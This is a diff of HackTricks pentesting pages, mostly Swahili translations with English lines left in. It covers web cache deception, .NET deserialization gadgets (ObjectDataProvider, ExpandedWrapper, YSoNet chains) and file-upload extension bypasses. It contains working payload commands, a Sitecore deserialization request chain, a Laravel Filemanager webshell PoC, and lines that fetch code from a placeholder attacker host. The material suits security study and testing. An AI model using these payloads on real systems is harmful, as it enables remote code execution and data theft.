Kwanza kumbuka kwamba **extensions** kama `.css`, `.js`, `.png` n.k. kawaida huwa **configured** kuhifadhiwa katika **cache.** Kwa hivyo, ikiwa utafikia `www.example.com/profile.php/nonexistent.js` cache inaweza kuhifadhi response kwa sababu inaona `.js` **extension**. Lakini, ikiwa **application** inarudisha maudhui nyeti ya mtumiaji yaliyohifadhiwa katika _www.example.com/profile.php_, unaweza **kuiba** yale maudhui kutoka kwa watumiaji wengine.
Kwanza tambua kwamba **extensions** kama `.css`, `.js`, `.png` n.k. kawaida huwa **configured** kuhifadhiwa katika **cache.** Kwa hiyo, ikiwa unafikia `www.example.com/profile.php/nonexistent.js` cache huenda itaweka response kwa sababu inaona `.js` **extension**. Lakini, ikiwa **application** inarudisha (replaying) maudhui ya watumiaji yenye taarifa za siri yaliyohifadhiwa kwenye _www.example.com/profile.php_, unaweza **steal** maudhui hayo kutoka kwa watumiaji wengine.
Mambo mengine ya kujaribu:
@ -268,19 +268,19 @@ Mambo mengine ya kujaribu:
- _www.example.com/profile.php/test.js_
- _www.example.com/profile.php/../test.js_
- _www.example.com/profile.php/%2e%2e/test.js_
- _Tumia extensions zisizojulikana kama_ `.avif`
- _Use lesser known extensions such as_ `.avif`
Another very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).\
Katika mfano, inafafanuliwa kuwa ikiwa unapakia ukurasa usiopo kama _http://www.example.com/home.php/non-existent.css_ yaliyomo ya _http://www.example.com/home.php_ (**yenye taarifa nyeti za mtumiaji**) yatarudishwa na server ya cache itahifadhi matokeo.\
Kisha, **attacker** anaweza kufikia _http://www.example.com/home.php/non-existent.css_ kwenye kivinjari chake na kuona **taarifa za siri** za watumiaji waliotembelea hapo awali.
Katika mfano huo, imeelezewa kwamba ikiwa utaweka ukurasa usiokuwepo kama _http://www.example.com/home.php/non-existent.css_ yaliyomo ya _http://www.example.com/home.php_ (**na taarifa za siri za mtumiaji**) yatarudishwa na cache server itaokoa matokeo hayo.\
Kisha, the **attacker** anaweza kufikia _http://www.example.com/home.php/non-existent.css_ kwenye browser yao mwenyewe na kuangalia **taarifa za siri** za watumiaji waliotembelea hapo awali.
Tambua kwamba **cache proxy** inapaswa kuwa **configured** kuhifadhi files **kwa msingi** wa **extension** ya file (_.css_) na siyo msingi wa content-type. Katika mfano _http://www.example.com/home.php/non-existent.css_ itakuwa na content-type `text/html` badala ya `text/css` mime type.
Kumbuka kwamba **cache proxy** inapaswa kuwa **configured** kuhifadhi files **based** kwenye **extension** ya file (_.css_) na sio kulingana na content-type. Katika mfano _http://www.example.com/home.php/non-existent.css_ itakuwa na `text/html` content-type badala ya `text/css` mime type.
Jifunze hapa kuhusu jinsi ya kufanya[ Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-deception).
## Vifaa Otomatiki
## Zana za Otomatiki
- [**toxicache**](https://github.com/xhzeem/toxicache): Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
- [**toxicache**](https://github.com/xhzeem/toxicache): Skana ya Golang ya kutafuta web cache poisoning vulnerabilities katika orodha ya URL na kujaribu injection techniques mbalimbali.
## References

96
src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
View File

@ -2,37 +2,37 @@
{{#include ../../banners/hacktricks-training.md}}
Chapisho hili limetengwa kuelewa jinsi gadget ObjectDataProvider inavyotumika kupata RCE na jinsi maktaba za Serialization Json.Net na xmlSerializer zinavyoweza kutumiwa vibaya pamoja na gadget hiyo.
Chapisho hili limetengwa kuelewa jinsi gadget ObjectDataProvider inavyotumika kupata RCE na jinsi maktaba za Serialization Json.Net na xmlSerializer zinavyoweza kutumiwa vibaya kwa gadget hiyo.
## ObjectDataProvider Gadget
From the documentation: _the ObjectDataProvider Class Wraps and creates an object that you can use as a binding source_.
Ndiyo, ni maelezo ya kushangaza, hivyo tuone nini darasa hili linao kinachovutia: Darasa hili huruhusu **wrap an arbitrary object**, kutumia _**MethodParameters**_ kuweka vigezo vya aina yoyote, na kisha **tumia MethodName kuitisha function yoyote** ya object iliyotajwa kwa kutumia vigezo hivyo.
Kwa hivyo, object yoyote ita**tekeleza** function yenye **parameters** wakati inatengenezwa upya (being deserialized).
From the documentation: _the ObjectDataProvider Class Wraps and creates an object that you can use as a binding source_.\
Ndiyo, ni maelezo ya ajabu, hivyo tuangalie nini hasa darasa hili lina chenye kuvutia: Darasa hili huruhusu **kuwrap object yoyote**, kutumia _**MethodParameters**_ ili **kusanidi parameters yoyote,** na kisha **kutumia MethodName kuita function yoyote** ya object hiyo iliyotajwa kwa kutumia parameters hizo.\
Kwa hivyo, **object** yoyote ita **tekeleza** **function** yenye **parameters wakati inapotengenezwa tena (deserialized).**
### **Jinsi hii inawezekana**
### **Jinsi hili linawezekana**
The **System.Windows.Data** namespace, found within the **PresentationFramework.dll** at `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF`, is where the ObjectDataProvider is defined and implemented.
Namespace ya **System.Windows.Data**, iliyopo ndani ya **PresentationFramework.dll** katika `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF`, ndiko ObjectDataProvider iliyoelezewa na kutekelezwa.
Using [**dnSpy**](https://github.com/0xd4d/dnSpy) you can **inspect the code** of the class we are interested in. In the image below we are seeing the code of **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name**
Using [**dnSpy**](https://github.com/0xd4d/dnSpy) unaweza **kuchunguza msimbo** wa darasa tunalolichunguza. Katika picha hapa chini tunaona msimbo wa **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name**
![](<../../images/image (427).png>)
Kama unavyoona, wakati `MethodName` inawekwa `base.Refresh()` inaitwa; tuchukulie tuangalie inafanya nini:
Kama unavyoweza kuona, inapowekwa `MethodName` inaitwa `base.Refresh()`, hebu tuangalie inafanya nini:
![](<../../images/image (319).png>)
Sawa, tuendelee kuona `this.BeginQuery()` inafanya nini. `BeginQuery` imeoverride na `ObjectDataProvider` na hapa ndilo linachofanya:
Sawa, tuendelee kuona `this.BeginQuery()` inafanya nini. `BeginQuery` imeoverride na `ObjectDataProvider` na hivi ndivyo inavyofanya:
![](<../../images/image (345).png>)
Kumbuka mwishoni mwa msimbo inaita `this.QueryWorke(null)`. Tazama inatekeleza nini wakati inaitwa:
Kumbuka kwamba mwishoni mwa msimbo inaita `this.QueryWorke(null)`. Hebu tazama hiyo inatekeleza nini:
![](<../../images/image (596).png>)
Kumbuka hii si msimbo kamili wa function `QueryWorker` lakini inaonyesha sehemu ya kuvutia: Msimbo **unaita `this.InvokeMethodOnInstance(out ex);`** — hapa ndilo mstari ambapo **method iliyowekwa inaitwa**.
Kumbuka kuwa hii si msimbo kamili wa function ya `QueryWorker` lakini inaonyesha sehemu inayovutia: Msimbo **unaita `this.InvokeMethodOnInstance(out ex);`** hii ndiyo mstari ambapo **seti ya method inatekelezwa**.
If you want to check that just setting the _**MethodName**_ **it will be executed**, you can run this code:
Ikiwa unataka kuthibitisha kuwa kwa tu kuweka _**MethodName**_ **itatekelezwa**, unaweza kuendesha msimbo huu:
```java
using System.Windows.Data;
using System.Diagnostics;
@ -52,16 +52,16 @@ myODP.MethodName = "Start";
}
}
```
Kumbuka kwamba unahitaji kuongeza kama reference _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ ili kupakia `System.Windows.Data`
Kumbuka kwamba unahitaji kuongeza kama marejeo _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ ili kupakia `System.Windows.Data`
## ExpandedWrapper
Ukitegemea exploit iliyotangulia, kutatokea kesi ambapo the **object** itakayokuwa **deserialized as** mfano wa _**ObjectDataProvider**_ (kwa mfano katika DotNetNuke vuln, kwa kutumia XmlSerializer, object ilideserializa kwa kutumia `GetType`). Kisha, haitakuwa na habari kuhusu aina ya object iliyofungwa ndani ya mfano wa _ObjectDataProvider_ (kwa mfano `Process`). Unaweza kupata [maelezo zaidi kuhusu DotNetNuke vuln hapa](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1).
Kutumia exploit iliyotangulia kutakuwa na matukio ambapo **object** itakuwa **deserialized as** mfano wa _**ObjectDataProvider**_ (kwa mfano katika DotNetNuke vuln, ukitumia XmlSerializer, object ilideserialize kwa kutumia `GetType`). Kisha, haitakuwa na **maarifa ya aina ya object iliyofungwa** katika mfano wa _ObjectDataProvider_ (kwa mfano `Process`). You can find more [information about the DotNetNuke vuln here](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1).
Class hii inaruhusu **kuainisha aina za object za vitu vinavyofungwa** katika instance fulani. Hivyo, class hii inaweza kutumika kufunga source object (_ObjectDataProvider_) ndani ya aina mpya ya object na kutoa properties tunazohitaji (_ObjectDataProvider.MethodName_ na _ObjectDataProvider.MethodParameters_).\
Hii ni muhimu sana kwa kesi kama ile iliyoonyeshwa hapo awali, kwa sababu tutakuwa na uwezo wa **wrap _ObjectDataProvider_ inside an _ExpandedWrapper_ instance** na **when deserialized** class hii itakuwa inafanya **create** object ya _**OjectDataProvider**_ ambayo ita**execute** function iliyoonyeshwa katika _**MethodName**_.
Hii class inaruhusu ku**bainisha aina za object za vitu vinavyofungwa** katika instance fulani. Kwa hivyo, class hii inaweza kutumika kufunga source object (_ObjectDataProvider_) ndani ya aina mpya ya object na kutoa properties tunazohitaji (_ObjectDataProvider.MethodName_ na _ObjectDataProvider.MethodParameters_).\
Hii ni muhimu sana kwa kesi kama ile iliyotangulia, kwa sababu tutaweza **wrap \_ObjectDataProvider**_** inside an **_**ExpandedWrapper** \_ instance and **when deserialized** this class will **create** the _**OjectDataProvider**_ object that will **execute** the **function** indicated in _**MethodName**_.
You can check this wrapper with the following code:
Unaweza kuangalia wrapper hii kwa kutumia code ifuatayo:
```java
using System.Windows.Data;
using System.Diagnostics;
@ -85,11 +85,11 @@ myExpWrap.ProjectedProperty0.MethodName = "Start";
```
## Json.Net
Katika [official web page](https://www.newtonsoft.com/json) inaonyesha kwamba maktaba hii inaruhusu **Serialize and deserialize any .NET object with Json.NET's powerful JSON serializer**. Kwa hiyo, ikiwa tunaweza **deserialize the ObjectDataProvider gadget**, tunaweza kusababisha **RCE** kwa ku-deserialize tu object.
Katika [ukurasa rasmi](https://www.newtonsoft.com/json) imeonyeshwa kwamba maktaba hii inaruhusu **Serialize and deserialize any .NET object with Json.NET's powerful JSON serializer**. Kwa hivyo, ikiwa tunaweza **deserialize the ObjectDataProvider gadget**, tunaweza kusababisha **RCE** kwa ku-deserialize tu object.
### Json.Net example
Kwanza kabisa tuchunguze mfano jinsi ya **serialize/deserialize** object kutumia maktaba hii:
Kwanza, tuchukulie mfano wa jinsi ya **serialize/deserialize** object kwa kutumia maktaba hii:
```java
using System;
using Newtonsoft.Json;
@ -134,7 +134,7 @@ Console.WriteLine(desaccount.Email);
```
### Kutumia vibaya Json.Net
Kutumia [ysoserial.net](https://github.com/pwntester/ysoserial.net) nilitengeneza exploit:
Kutumia [ysoserial.net](https://github.com/pwntester/ysoserial.net) niliunda exploit:
```java
yoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
{
@ -147,7 +147,7 @@ yoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
```
Katika msimbo huu unaweza **jaribu exploit**, endesha tu na utaona kwamba calc itaanzishwa:
Katika msimbo huu unaweza **test the exploit**, endesha tu na utaona kwamba calc inatekelezwa:
```java
using System;
using System.Text;
@ -184,27 +184,27 @@ TypeNameHandling = TypeNameHandling.Auto
}
}
```
## Mnyororo ya Gadget za Advanced .NET (YSoNet & ysoserial.net)
## Advanced .NET Gadget Chains (YSoNet & ysoserial.net)
Mbinu ya ObjectDataProvider + ExpandedWrapper iliyotanguliwa hapo juu ni moja tu kati ya MNYA mnyororo za gadget zinazoweza kutumiwa wakati programu inafanya **unsafe .NET deserialization**. Zana za kisasa za red-team kama **[YSoNet](https://github.com/irsdl/ysonet)** (na ile ya zamani [ysoserial.net](https://github.com/pwntester/ysoserial.net)) zinafanya otomatiki uundaji wa **ready-to-use malicious object graphs** kwa micolonyo mingi ya gadget na miundo ya serialization.
The ObjectDataProvider + ExpandedWrapper technique introduced above is only one of MANY gadget chains that can be abused when an application performs **unsafe .NET deserialization**. Modern red-team tooling such as **[YSoNet](https://github.com/irsdl/ysonet)** (and the older [ysoserial.net](https://github.com/pwntester/ysoserial.net)) automate the creation of **ready-to-use malicious object graphs** for dozens of gadgets and serialization formats.
Hapo chini ni rejea iliyoshinikizwa ya mnyororo muhimu zaidi zinazotoka ndani ya *YSoNet* pamoja na ufafanuzi mfupi wa jinsi zinavyofanya kazi na mifano ya amri za kuunda payload.
Below is a condensed reference of the most useful chains shipped with *YSoNet* together with a quick explanation of how they work and example commands to generate the payloads.
| Gadget Chain | Wazo Kuu / Primitive | Serializers Za Kawaida | YSoNet one-liner |
|--------------|----------------------|------------------------|------------------|
| **TypeConfuseDelegate** | Inaharibu rekodi ya `DelegateSerializationHolder` ili, mara ikirejeshwa, delegate itamwelekeza kwenye *method* yoyote iliyotolewa na mshambuliaji (kwa mfano `Process.Start`) | `BinaryFormatter`, `SoapFormatter`, `NetDataContractSerializer` | `ysonet.exe TypeConfuseDelegate "calc.exe" > payload.bin` |
| **ActivitySurrogateSelector** | Inatumia vibaya `System.Workflow.ComponentModel.ActivitySurrogateSelector` ili *kuipita type-filtering ya .NET ≥4.8* na kuitisha moja kwa moja **constructor** ya darasa lililotolewa au **kucompile** faili ya C# kwa wakati huo | `BinaryFormatter`, `NetDataContractSerializer`, `LosFormatter` | `ysonet.exe ActivitySurrogateSelectorFromFile ExploitClass.cs;System.Windows.Forms.dll > payload.dat` |
| **DataSetOldBehaviour** | Inatumia uwakilishi wa **XML wa zamani** wa `System.Data.DataSet` kuanzisha aina yoyote kwa kujaza sehemu za `<ColumnMapping>` / `<DataType>` (kwa hiari kuiga assembly kwa `--spoofedAssembly`) | `LosFormatter`, `BinaryFormatter`, `XmlSerializer` | `ysonet.exe DataSetOldBehaviour "<DataSet>…</DataSet>" --spoofedAssembly mscorlib > payload.xml` |
| **GetterCompilerResults** | Kwa runtimes zilizo na WPF (> .NET 5) inachomeka getters za mali hadi kufikia `System.CodeDom.Compiler.CompilerResults`, kisha *inacompile* au *inapakia* DLL iliyotolewa na `-c` | `Json.NET` typeless, `MessagePack` typeless | `ysonet.exe GetterCompilerResults -c Loader.dll > payload.json` |
| **ObjectDataProvider** (review) | Inatumia WPF `System.Windows.Data.ObjectDataProvider` kuita method static yoyote yenye arguments zinazodhibiwa. YSoNet inaongeza chaguo la `--xamlurl` ili kuhost malicioius XAML kwa mbali | `BinaryFormatter`, `Json.NET`, `XAML`, *etc.* | `ysonet.exe ObjectDataProvider --xamlurl http://attacker/o.xaml > payload.xaml` |
| **PSObject (CVE-2017-8565)** | Inaweka `ScriptBlock` ndani ya `System.Management.Automation.PSObject` ambalo linafanywa wakati PowerShell inadeserialise object | PowerShell remoting, `BinaryFormatter` | `ysonet.exe PSObject "Invoke-WebRequest http://attacker/evil.ps1" > psobj.bin` |
| Gadget Chain | Key Idea / Primitive | Common Serializers | YSoNet one-liner |
|--------------|----------------------|--------------------|------------------|
| **TypeConfuseDelegate** | Inaharibu rekodi ya `DelegateSerializationHolder` ili, mara inaporudiwa/kutanuliwa, delegate ianze kuelekeza kwa method yoyote iliyotolewa na mshambuliaji (mf. `Process.Start`) | `BinaryFormatter`, `SoapFormatter`, `NetDataContractSerializer` | `ysonet.exe TypeConfuseDelegate "calc.exe" > payload.bin` |
| **ActivitySurrogateSelector** | Inatumia `System.Workflow.ComponentModel.ActivitySurrogateSelector` kuvuka *type-filtering* ya .NET ≥4.8 na kuwaita moja kwa moja **constructor** ya class iliyotolewa au **kucompila** faili ya C# kwa wakati mmoja | `BinaryFormatter`, `NetDataContractSerializer`, `LosFormatter` | `ysonet.exe ActivitySurrogateSelectorFromFile ExploitClass.cs;System.Windows.Forms.dll > payload.dat` |
| **DataSetOldBehaviour** | Inategemea uwakilishi wa **XML wa legacy** wa `System.Data.DataSet` kuanzisha types zozote kwa kujaza katika sehemu za `<ColumnMapping>` / `<DataType>` (kwa hiari ikidanganya assembly kwa `--spoofedAssembly`) | `LosFormatter`, `BinaryFormatter`, `XmlSerializer` | `ysonet.exe DataSetOldBehaviour "<DataSet>…</DataSet>" --spoofedAssembly mscorlib > payload.xml` |
| **GetterCompilerResults** | Katika runtimes zinazounga mkono WPF (> .NET 5) inafuatilia getters za property mpaka kufikia `System.CodeDom.Compiler.CompilerResults`, kisha *inaweka kucompile* au *inakamilisha* DLL iliyotolewa kwa `-c` | `Json.NET` typeless, `MessagePack` typeless | `ysonet.exe GetterCompilerResults -c Loader.dll > payload.json` |
| **ObjectDataProvider** (review) | Inatumia WPF `System.Windows.Data.ObjectDataProvider` kuita method statiki yoyote kwa arguments zinazodhibitiwa. YSoNet inaongeza variant ya `--xamlurl` inayohost mali ya XAML mbaya kwa mbali | `BinaryFormatter`, `Json.NET`, `XAML`, *etc.* | `ysonet.exe ObjectDataProvider --xamlurl http://attacker/o.xaml > payload.xaml` |
| **PSObject (CVE-2017-8565)** | Inaweka `ScriptBlock` ndani ya `System.Management.Automation.PSObject` ambacho kinatekelezwa wakati PowerShell inafanya deserialize ya object | PowerShell remoting, `BinaryFormatter` | `ysonet.exe PSObject "Invoke-WebRequest http://attacker/evil.ps1" > psobj.bin` |
> [!TIP]
> Payload zote huandikwa kwa **stdout** kwa chaguo-msingi, kufanya iwe rahisi kuzitumia kwa kupipa (pipe) kwenye zana nyingine (mfano ViewState generators, base64 encoders, HTTP clients).
> All payloads are **written to *stdout*** by default, making it trivial to pipe them into other tooling (e.g. ViewState generators, base64 encoders, HTTP clients).
### Kujenga / Kuisakinisha YSoNet
### Building / Installing YSoNet
Ikiwa hakuna binaries zilizojengwa tayari zinapatikana chini ya *Actions ➜ Artifacts* / *Releases*, PowerShell one-liner ifuatayo itaweka mazingira ya kujenga, kukuza repository na kucompile kila kitu katika mode ya *Release*:
If no pre-compiled binaries are available under *Actions ➜ Artifacts* / *Releases*, the following **PowerShell** one-liner will set up a build environment, clone the repository and compile everything in *Release* mode:
```powershell
Set-ExecutionPolicy Bypass -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
@ -216,22 +216,22 @@ cd ysonet
nuget restore ysonet.sln
msbuild ysonet.sln -p:Configuration=Release
```
The compiled `ysonet.exe` can then be found under `ysonet/bin/Release/`.
Iliyocompiled `ysonet.exe` inaweza kupatikana chini ya `ysonet/bin/Release/`.
### Ugundaji & Kuimarisha
* **Gundua** unexpected child processes of `w3wp.exe`, `PowerShell.exe`, or any process deserialising user-supplied data (e.g. `MessagePack`, `Json.NET`).
* Wezesha na **lazimisha type-filtering** (`TypeFilterLevel` = *Full*, custom `SurrogateSelector`, `SerializationBinder`, *etc.*) kila inapowezekana wakati legacy `BinaryFormatter` / `NetDataContractSerializer` haziwezi kuondolewa.
* Ambapo inawezekana hamisha kwenda **`System.Text.Json`** au **`DataContractJsonSerializer`** kwa converters zinazotegemea orodha ya kuruhusiwa.
* Zuia WPF assemblies hatari (`PresentationFramework`, `System.Workflow.*`) kupewa load katika web processes ambazo hazipaswi kuhitaji.
### Utambuzi na Kuimarisha Usalama
* **Gundua** mchakato mdogo usiotarajiwa wa `w3wp.exe`, `PowerShell.exe`, au mchakato wowote unaofanya deserialising ya data iliyotolewa na mtumiaji (mfano `MessagePack`, `Json.NET`).
* Weka na **lazimisha kuchuja aina** (`TypeFilterLevel` = *Full*, custom `SurrogateSelector`, `SerializationBinder`, *etc.*) kila wakati ambapo urithi wa `BinaryFormatter` / `NetDataContractSerializer` hauwezi kuondolewa.
* Iwapo inawezekana, hamia kwa **`System.Text.Json`** au **`DataContractJsonSerializer`** kwa converters zinazotumia whitelist.
* Zuia assemblies hatarishi za WPF (`PresentationFramework`, `System.Workflow.*`) zisipakwe katika mchakato za wavuti ambazo haziziitaji.
## Mfano halisi wa sink: Sitecore convertToRuntimeHtml → BinaryFormatter
## Sink ya ulimwengu halisi: Sitecore convertToRuntimeHtml → BinaryFormatter
Sink ya vitendo ya .NET inayoweza kufikiwa katika mtiririko wa Sitecore XP Content Editor yenye uthibitisho:
Sink ya vitendo ya .NET inayoweza kufikiwa katika mtiririko ya Sitecore XP Content Editor yaliyothibitishwa:
- Sink API: `Sitecore.Convert.Base64ToObject(string)` inafunika `new BinaryFormatter().Deserialize(...)`.
- Njia ya kuanzisha: pipeline `convertToRuntimeHtml``ConvertWebControls`, ambayo inatafuta kipengele jirani chenye `id="{iframeId}_inner"` na inasoma attribute ya `value` ambayo inachukuliwa kama data iliyoseriwalishwa iliyofungwa kwa base64. Matokeo hubadilishwa kuwa string na kuyaingiza kwenye HTML.
- Sink API: `Sitecore.Convert.Base64ToObject(string)` inaitumia `new BinaryFormatter().Deserialize(...)`.
- Njia ya kuchochea: pipeline `convertToRuntimeHtml``ConvertWebControls`, ambayo inatafuta kipengele jirani lenye `id="{iframeId}_inner"` na kusoma sifa ya `value` ambayo inachukuliwa kama data iliyoserialiwa iliyoencodewa kwa base64. Matokeo yanageuzwa kuwa string na yaingizwa ndani ya HTML.
Minimal endtoend (iliyothibitishwa):
Mfupi kutoka mwanzo hadi mwisho (iliyothibitishwa):
```
// Load HTML into EditHtml session
POST /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.aspx
@ -246,9 +246,9 @@ __PARAMETERS=edithtml:fix&...&ctl00$ctl00$ctl05$Html=
// Server returns a handle; visiting FixHtml.aspx?hdl=... triggers deserialization
GET /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.FixHtml.aspx?hdl=...
```
- Gadget: mnyororo wowote wa BinaryFormatter unaorejesha string (madhara ya pembeni yanaendeshwa wakati wa deserialization). Angalia YSoNet/ysoserial.net ili kuzalisha payloads.
- Gadget: yoyote BinaryFormatter chain inayorejesha string (sideeffects zinaendeshwa wakati wa deserialization). Angalia YSoNet/ysoserial.net ili kutengeneza payloads.
Kwa mnyororo kamili unaoanza preauth kwa HTML cache poisoning katika Sitecore na unaoelekeza kwa sink hii:
For a full chain that starts preauth with HTML cache poisoning in Sitecore and leads to this sink:
{{#ref}}
../../network-services-pentesting/pentesting-web/sitecore/README.md

174
src/pentesting-web/file-upload/README.md
View File

@ -1,13 +1,13 @@
# Kupakia Faili
# Upakiaji wa Faili
{{#include ../../banners/hacktricks-training.md}}
## Mbinu za Jumla za Kupakia Faili
## Mbinu Za Jumla za Upakiaji wa Faili
Extensions nyingine muhimu:
Nyongeza nyingine muhimu:
- **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_
- **Working in PHPv8**: _.php_, _.php4_, _.php5_, .phtml_, .module_, .inc_, .hphp_, .ctp_
- **Working in PHPv8**: _.php_, _.php4_, _.php5_, .phtml_, .module_, _.inc_, _.hphp_, _.ctp_
- **ASP**: _.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml_
- **Jsp:** _.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action_
- **Coldfusion:** _.cfm, .cfml, .cfc, .dbm_
@ -17,11 +17,11 @@ Extensions nyingine muhimu:
### Bypass file extensions checks
1. Ikiwa zinatumika, **kagua** **extensions zilizotajwa hapo awali.** Pia zijaribu kwa kutumia **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Kagua **kuongeza extension halali kabla** ya extension ya utekelezaji (tumia extensions zilizotajwa pia):_
1. Ikiwa inatumika, angalia **nyongeza zilizotajwa hapo awali.** Pia zijaribu kwa kutumia **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Angalia **kuongeza extension halali kabla** ya extension ya utekelezaji (tumia pia nyongeza zilizotajwa hapo awali):_
- _file.png.php_
- _file.png.Php5_
3. Jaribu kuongeza **herufi maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa **ascii** na **Unicode** herufi. (_Kumbuka kwamba unaweza pia kujaribu kutumia **extensions** zilizotajwa hapo awali_)
3. Jaribu kuongeza **alama maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa tabia zote za **ascii** na **Unicode**. (_Kumbuka kwamba unaweza pia kujaribu kutumia **extensions** zilizotajwa awali_)
- _file.php%20_
- _file.php%0a_
- _file.php%00_
@ -31,7 +31,7 @@ Extensions nyingine muhimu:
- _file._
- _file.php...._
- _file.pHp5...._
4. Jaribu kupita vizingiti kwa **kudanganya parser ya extension** upande wa server kwa mbinu kama **kuzidisha** **extension** au **kuongeza data taka** (bytes **null**) kati ya extensions. _Unaweza pia kutumia **extensions** zilizotajwa hapo awali kutayarisha payload bora._
4. Jaribu kupita ulinzi kwa **kufinya extension parser** upande wa server kwa mbinu kama **kuzidisha** extension au **kuongeza data chafu** (byte za **null**) kati ya extensions. _Unaweza pia kutumia **extensions** zilizotajwa awali kutengeneza payload bora._
- _file.png.php_
- _file.png.pHp5_
- _file.php#.png_
@ -40,13 +40,13 @@ Extensions nyingine muhimu:
- _file.php%0a.png_
- _file.php%0d%0a.png_
- _file.phpJunk123png_
5. Ongeza **tabaka nyingine za extensions** kwa ukaguzi uliopita:
5. Ongeza **safu nyingine ya extensions** kwa ukaguzi uliopita:
- _file.png.jpg.php_
- _file.php%00.png%00.jpg_
6. Jaribu kuweka **exec extension before the valid extension** na kuomba server iwe misconfigured. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code):
6. Jaribu kuweka **extension ya utekelezaji kabla ya extension halali** na uombe kuwa server imepangwa vibaya. (inafaa kutumiwa kwenye misconfigurations ya Apache ambapo chochote chenye extension **.php**, lakini **si lazima kiishie kwa .php**, kitatekeleza code):
- _ex: file.php.png_
7. Kutumia **NTFS alternate data stream (ADS)** kwenye **Windows**. Katika kesi hii, tabia ya colon ":" itaingizwa baada ya extension iliyoruhusiwa na kabla ya ile iliyoruhusiwa. Matokeo yake, faili tupu yenye extension iliyoruhusiwa itaundwa kwenye server (mfano "file.asax:.jpg"). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama kutumia short filename yake. Mfano wa **::$data** pia unaweza kutumika kuunda faili zisizo tupu. Kwa hiyo, kuongeza nukta baada ya mfano huu pia inaweza kusaidia kupita vizingiti zaidi (mfano. "file.asp::$data.")
8. Jaribu kuvunja mipaka ya jina la faili. Extension halali inakatika. Na PHP hasidi inabaki. AAA<--SNIP-->AAA.php
7. Tumia **NTFS alternate data stream (ADS)** katika **Windows**. Katika kesi hii, herufi kolon ":" itaingizwa baada ya extension iliyoruhusiwa na kabla ya ile iliyoruhusiwa. Kama matokeo, faili tupu yenye extension iliyoruhusiwa itaundwa kwenye server (mfano "file.asax:.jpg"). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama kutumia short filename yake. Muundo wa "**::$data**” pia unaweza kutumika kuunda faili zisizo tupu. Kwa hiyo, kuongeza nukta baada ya muundo huu kunaweza kusaidia kupita vikwazo zaidi (.mfano "file.asp::$data.")
8. Jaribu kuvunja mipaka ya jina la faili. Extension halali inakatwa. Na PHP hasidi inabaki. AAA<--SNIP-->AAA.php
```
# Linux maximum 255 bytes
@ -61,11 +61,11 @@ AAA<--SNIP 232 A-->AAA.php.png
#### UniSharp Laravel Filemanager pre-2.9.1 (.php. trailing dot) CVE-2024-21546
Baadhi ya upload handlers huondoa au ku-normalize nukta zilizofuatia kwenye jina la faili lililosalazwa. Katika UniSharps Laravel Filemanager (unisharp/laravel-filemanager) matoleo kabla ya 2.9.1, unaweza kupita ukaguzi wa extension kwa:
Baadhi ya upload handlers hupunguza au kuwa-normalize herufi za dot mwishoni kutoka kwenye jina la faili lililosajiliwa. Katika UniSharps Laravel Filemanager (unisharp/laravel-filemanager) matoleo kabla ya 2.9.1, unaweza kupita ukaguzi wa extension kwa:
- Kutumia MIME ya picha halali na magic header (mfano, PNGs `\x89PNG\r\n\x1a\n`).
- Kuita faili iliyopakiwa kwa extension ya PHP ikifuatiwa na nukta, kwa mfano, `shell.php.`.
- Server huondoa nukta ya mwisho na kusababisha `shell.php` kuendelea kuwepo, ambayo itaendeshwa ikiwa imewekwa kwenye directory inayotumika kuwahudumia mtandao (default public storage like `/storage/files/`).
- Kutumia MIME ya picha halali na magic header (kwa mfano, PNGs `\x89PNG\r\n\x1a\n`).
- Kuita faili iliyopakiwa kwa extension ya PHP ikifuatiwa na dot, mfano, `shell.php.`.
- Server huondoa dot ya mwisho na kuhifadhi `shell.php`, ambayo itatekelezwa ikiwa itawekwa kwenye directory inayotumika kwa web (default public storage kama `/storage/files/`).
Minimal PoC (Burp Repeater):
```http
@ -85,37 +85,37 @@ Kisha fikia path iliyohifadhiwa (kawaida katika Laravel + LFM):
GET /storage/files/0xdf.php?cmd=id
```
Mitigations:
- Sasisha unisharp/laravel-filemanager hadi ≥ 2.9.1.
- Lazimisha allowlists kali upande wa server na thibitisha tena jina la faili lililohifadhiwa.
